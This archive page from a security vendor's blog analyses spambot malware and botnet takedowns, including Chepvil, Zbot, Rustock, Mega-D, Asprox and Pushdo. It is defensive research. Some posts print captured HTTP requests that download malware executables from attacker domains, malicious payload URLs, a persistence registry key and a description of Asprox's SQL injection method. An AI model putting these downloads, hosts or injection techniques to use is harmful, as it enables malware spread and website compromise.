Spambot « M86 Security Labs Blog

Posts Tagged ‘Spambot’

An analysis of the ACH spam campaign

By Rodel Mendrez • September 6th, 2011 • Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet

The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a random generated domain to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10kb.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = “”C:\Documents and Settings\{user}\Application Data\KB117188.exe”"

After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.

Instead of listening to a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query to the domain name luis-vuitton-elite[dot]com. However if that fails, the bot attempts to connect to a randomly generated domain name.

The malware code that attempts to connect to the control server

Once connected, the proxy spambot initializes port 1001 where it sends and receives packets of data from the control server.

Exchange of data between the control server and the spambot

Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.

The command and control server’s IP address is based in Germany:

WHOIS information about the control server

This spambot’s recent spamming activities includes both pharmaceutical, and further ACH campaigns that appears to be from NACHA.org; and are very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events. A spammed-out trojan downloader which triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer, and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering and the best way to protect yourself is to be cautious.

New Bots, Old Bots: Xarvester Returns

By Phil Hay • May 24th, 2011 • Botnets

There has been quite a shake up in the spamming underworld ever since SpamIt.com closed shop and the Rustock botnet was disrupted. A look at our weekly spam statistics shows that spam volume has dropped substantially, making this year (so far) a happy one for anti-spammers. While spam output has remained low, the statistics also show quite a shakeup in the bots used to distribute spam.

Surprisingly, since around March, we have observed a big rise in spam from two botnets well known to us from the past – Donbot and Xarvester. Six months ago, spam from these botnets hardly got our attention. But now, clearly, someone has breathed new life into these spamming machines.

Xarvester first came to our attention over two years ago, when it rose to prominance after the hosting provider McColo was unplugged, decimating the then leading spamming botnet Srizbi. We have also seen Xarvester clearly linked to Spamit.com, when we discovered Spamit ‘footprints’ in Xarvester spam templates. So when we recently came across a Xarvester bot, we decided to take a closer look. The sample we used is not named Xarvester by any anti-virus vendor, Microsoft were calling it Bymot, and AVG called it simply SpamTool (VirusTotal Report). A look at the strings in the malware body confirmed to us that what we we looking at was indeed Xarvester, as we had seen these strings in previous Xarvester bots.

Both the highlighed command and control domains are hard coded into the malware and both point to the same IP address.

The spambot itself is relatively simple. When the executable is run, it first performs a query to checkip.dyndns.com to check the IP address of the host. The bot then connects to the def2010cnt[dot]biz domain on port 12309, and requests an encrypted file, which, when decrypted, proves to be a container for a bunch of files the bot needs to spam.

Again, this is very similar to what we saw with Xarvester over two years ago. The bot typically does not perform DNS lookups for each spam message, instead the IP address for each target domain are downloaded in the package. The headers of the spam messages are very uniform, and closer inspection shows that the bulk of the header is hard coded in the malware body, which is unusual when compared to many of the other bots we see today that vary headers regularly. Even the content of the message body has a familiar look to it. Compare the message body today:

With a message we saw from Xarvester two years ago:

So, Xarvester has been dusted off and is back to flogging replica watches – who would have thought?

We have updated our spambot description for Xarvester, which you can find here.

Thanks to Gavin Neale and Rodel Mendrez who contributed to the analysis of this bot.

Your Music Order – a loaded PDF

By Phil Hay • March 31st, 2011 • Spam

We are noticing a spam campaign at the moment that purports to be a Music or Cell Phone “Order” with an attached PDF file with the following similar Subject lines:

Your Order No 129589 – Warner Music Inc.
Your Order No 489889 – Cell Phone Inc.

The attached PDF contains a bunch of obfuscated JavaScript, which attempts to exploit the Adobe getIcon vulnerability (CVE-2009-0927). If successful, the following payload is downloaded:

hxxp://kawabungashop.ru/flash/1.php

The 1.php file is an executable downloader (VirusTotal Report). Another piece of malware is then downloaded and installed (VirusTotal Report), which is a spambot that proceeds to spam further copies of the PDF file, as you can see from the template we captured:

These days, PDF files arriving in unexpected emails should be treated with extreme suspicion. And please be sure to keep your PDF reader meticulously up to date to avoid getting exploited by old vulnerabilities such as this.

Rustock down?

By Phil Hay • March 16th, 2011 • Spam

A story emerged today on KrebsonSecurity about the Rustock botnet being disabled, and spam volumes from this rogue spammer plummeting.

A brief look at at our spam traps today confirmed that output from Rustock did indeed dry up today. The chart below shows an index of daily spam volume changes from Rustock over the last few weeks:

Today, Rustock spam completely stopped (16 March, 3pm GMT). We can also confirm that the Rustock control servers that we know about are not responding. It is unclear yet who or what caused the shutdown. Its also possible it has been abandoned. Over the past three years, Rustock has been responsible for a huge amount of spam, at times representing half of all spam caught in our spam traps. But since September last year, when Spamit.com was shut down, its output diminished significantly, and its spam templates hardly changed.

Whatever the reason, lets hope this one sticks. Previous attempts at botnet shutdowns have tended to be short lived as the botnet herders simply regroup and start again. Its too early to say bye bye Rustock, but the thought is certainly nice.

Update: According to a Wall Street Journal report here it looks like Microsoft, in conjunction with US Federal authorities, was responsible for the takedown of Rustock.

Tags: Rustock | Spam Volume | Spambot | takedowns

Mega-D Botnet Operator Revealed

By Phil Hay • December 2nd, 2010 • Spam

Interesting details emerged today regarding the Mega-D botnet. The FBI has identified the Russian Oleg Nikolaenko as the operator of the botnet and has filed papers with a US District Court for his arrest. Brian Krebs from KrebsOnSecurity has a good article on the issue here, including a link to the court documents.

M86 Security Labs has monitored the Mega-D botnet closely ever since we noticed huge volumes of spam emanating from it in early 2008. In fact we originally dubbed it Mega-D because of its numerous and distinctive “Megadik” spam campaigns at that time. Mega-D has since had its ups and downs as various researchers and law enforcement authorities took ever greater interest in it. The timeline below shows the blog entries we have done on events relating to Mega-D over time.

The court document makes interesting reading. The FBI found Nikolaenko through data revealed in the 2008 US Federal Trade Commission investigation into Affking, the affiliate program linked to Genbucks that was responsible for “Megadik” and other similar brands. M86 Security Labs provided assistance to the FTC and New Zealand authorities in this original investigation. Between 6 June 2007 and 14 December 2007, payments totalling around $465,000 were made by Affking into an ePassporte account registered to Nikolaenko for the services of spamming.

Over the last few months, Mega-D spam activity has dried up and its control servers have become non-responsive. It no longer features in our spam tracking statistics. In reality, Mega-D has been on the decline for some time, probably as a result of all the interest by researchers and the authorities.

It’s encouraging to see law enforcement agencies going after these bot-herding criminals. Identifying and incapacitating the individuals behind the malware is one of the best ways to keep these giant spam-spewing systems in check.

Timeline:

Feb-2008: Spam from botnet “Mega-D” constituted 32% of spam, malware identified and control servers disabled

Feb-2008: Mega-D recovers and resumes spamming

October-2008: FTC initiates action against AffKing affiliate program

November-2008: McColo takedown halted operations on Mega-D and other spamming botnets

December-2008: Mega-D resumes spamming

November-2009: Mega-D operations disrupted by FireEye

February-2010: Mega-D resumes spamming…again

December-2010: FBI identifies Mega-D’s operator

Tags: Affiliate Programs | Mega-D | Spambot | SpamIt | takedowns

FedEx Spam Seeding New Asprox Binary

By Rodel Mendrez • August 28th, 2010 • Spam

Over the past few days, the Asprox botnet has been spamming out a fake FedEx campaign. We noticed this after we saw our old Asprox binaries downloading a new updated “196” version from the bot’s command and control server.

This Asprox update is responsible for spamming this week’s FedEx malicious spam campaign.

The attachment in this spam campaign is a downloader Trojan known by some AV products as Oficla or Sasfis. When run, the Trojan retrieves commands from its control server to download the Asprox spambot binary, that in turn, sends this FedEx spam campaign. Below is an graphical overview of this campaign.

Asprox spam campaigns come and go. A couple of months ago we blogged about a spam campaign where the Asprox binary also launched an SQL injection attack targeting ASP websites. A month after, it stopped and the command and control servers were inaccessible. Now it’s back again using the same C&C domain and seeding a new binary. Since the Asprox bot is capable of updating itself on the infected host, our concern is that the next update may launch another round of SQL injection attacks. We will certainly be monitoring it closely.

Pushdo Botnet Crippled

By Phil Hay • August 27th, 2010 • Botnets

This morning we noticed that the usual torrent of spam from the Pushdo (or Cutwail) botnet had turned into a dribble. The chart below shows an index of Pushdo spam volume over the month of August.

Pushdo Stats

So what’s the reason for this sudden decline? It turns out that the folks at TLLOD have been busy analyzing Pushdo command and control servers, and coordinating their take down. According to their blog, over 30 Pushdo control servers were identified and 20 were taken down with the help of the relevant hosting providers. However, there still remains a few active control servers still serving up spamming data.

As the chart above shows, this coordinated takedown has had an immediate impact on Pushdo’s spam output. This is welcome news indeed, especially as Pushdo has been responsible for wave after wave of malicious spam campaigns in recent months. Still, we must sound a note of caution. Previous experience has taught us that these botnet take downs are short lived. Disabling control servers does not incapacitate the people behind the botnet. It is highly likely they’ll be back before long with new control servers, and bots to do their spamming. In the meantime, we can enjoy a few days with less spam about.

Tags: Cutwail | Malicious Spam | Spambot | takedowns

Revisiting the King of Spam

By Rodel Mendrez • July 29th, 2010 • Botnets

We keep a close eye on spam and the malware that drives spam production. Our recent report highlighted some of the worst offenders, and Rustock is without a doubt the leader of the pack. Over the last six months, the proportion of Rustock spam in our spam traps peaked to nearly 60% and it has never returned to levels lower than 20% of total spam.

Who’s the Rustock spambot that we know?

Over time, we have observed regular updates to Rustock. There is no consistent name given to it by anti-virus vendors, but recent Rustock binaries are detected by some anti-virus engines as Bubnix. The newest Rustock variant was first detected last December 2009. A month after that we observed a large influx of Rustock spam that spiked to over 50% of the spam we observed over the next few months. Though the malware may have different detection names and OS installation behavior, it employs a similar rootkit-based spamming engine, similar command and control architecture, and similar observable patterns in spam traffic.

Tags: Canadian Pharmacy | Rustock | Spambot

Another round of Asprox SQL injection attacks

By Rodel Mendrez • June 23rd, 2010 • Botnets

Earlier this month, we reported on a new variant of Asprox malware which was being spammed out by the Pushdo botnet. At that time, the Asprox executables we analyzed were purely sending spam. However, a few days after our post, we noticed reports of mass infections of IIS/ASP websites. The nature of these attacks reminded us of SQL injection attacks back in 2008 where Asprox was clearly involved. We suspected that the re-emergence of Asprox and these new mass website infections were not merely a coincidence. Well, this week our suspicions were confirmed when we came across another version of Asprox which started to launch both spam and SQL injection attacks.

As of this writing, there are three fast-flux domains that the bot attempts to contact.

CL63AMGSTART.RU
HYPERVMSYS.RU
ML63AMGSTART.RU

These domains resolve to Asprox’s control servers, which respond with spam templates, target email addresses, Asprox malware updates, as well as SQL injection attack information and lists of target ASP websites.

When analyzing the new Asprox binary that we pulled from the command and control server, we noticed some interesting clues that show that Asprox is behind the latest SQL injection attacks.

Figure 1: SQL statement in the Asprox malware body used to launch the SQL injection attack. As of this writing this malware had a poor detection rate .

The Asprox bot downloads an encrypted XML file that contains a list of target ASP websites and some other information such as a Google search term to search for more potential targets.

Figure 2: The decrypted XML file which the bot receives. Contains a list of information such as target websites.

When the Asprox bot launches an SQL injection attack, the initial request looks similar to this:

The SQL statement is passed to a target ASP website and executes a series of URL encoded SQL queries, which when decoded, look like this:

Enclosed in the SQL CAST function is another hexadecimal encoded string. Decoding it reveals a <script> tag that reveals malicious JavaScript code hosted on a remote site. The sub-domain part of this URL varies, so administrators should seek to block the domain:

Update:

We have seen new domains hosting the malicious JavaScript, although, as yet, the number of infected sites are not as numerous. Again, the sub-domain part varies.

http://manage[dot]webservicekuz[dot]ru/js.js

http://stream[dot]webservicesttt[dot]ru/js.js

http://media[dot]webservicefull[dot]ru/js.js

http://edit[dot]webservicezok[dot]ru/js.js

http://redir[dot]webserviceforward[dot]ru/js.js

http://shell[dot]webserviceget[dot]ru/js.js

http://rid[dot]webservicedevlop[dot]ru/js.js

The SQL attack queries a special table in the SQL server sysobjects and syscolumns in an attempt to get the available “user” tables and fields in the website’s database. Walking through the tables and fields, the attack appends the malicious <script> tag to the selected values, in effect poisoning the website’s database. Once a web page uses a string from the poisoned database, the malicious <script> tag is injected into that web page. When we performed a Google search of this domain, we saw over 5000 websites infected:

So Asprox is back with a vengeance, and doing its typically Asprox-like things, namely spamming and SQL injection. Anyone have a feeling of déjà vu?

Tags: ASP | Asprox | Spambot | SQL Injection

Pushdo uses World Cup Theme to Spread Malware

By Gavin Neale • June 15th, 2010 • Malware

Over the last couple of days we have been seeing numerous malicious and Canadian Pharmacy spam campaigns sent from the Pushdo botnet. This campaign features an HTML file as an attachment and some subject lines, including one that mentions the FIFA World Cup, that may fool unwary recipients. Some of the email subjects we have seen are:

FIFA World Cup South Africa… bad news

[Recipient Domain] account Information

[Random Email Address] has sent you a birthday ecard.

Reset your Twitter password

The HTML file attachment contains the following JavaScript:

We have seen several different variations of this script but all have the same purpose which is concealed by some very basic obfuscation. If we remove the parts of this script that aren’t doing anything and clean up some of the text we get the script below:

If this attachment was opened in a browser with JavaScript enabled then the script will redirect the browser to the file z.htm (shown below) on one of several different web servers.

This page waits for three seconds and then redirects the browser to a Canadian Pharmacy website. While waiting, a hidden IFrame is loaded. We have removed some of the obfuscation to make the script in this IFrame more readable:

This script checks each of the browser’s plugins to see if any contain the words ‘Adobe Acrobat’ or ‘Adobe PDF’ in their name. This is looking for any Adobe PDF readers and if one is found, adds an IFrame to the page pointing to a malicious PDF file.

The script then checks if Java (Thats Sun Microsystem’s Java, not JavaScript) is enabled, and if so, adds an IFrame that exploits vulnerabilities in Java.

The exploits install an executable named game.exe which we have not yet analyzed and is not detected by many anti virus products.

Tags: Malicious Spam | Pushdo | Spambot | World Cup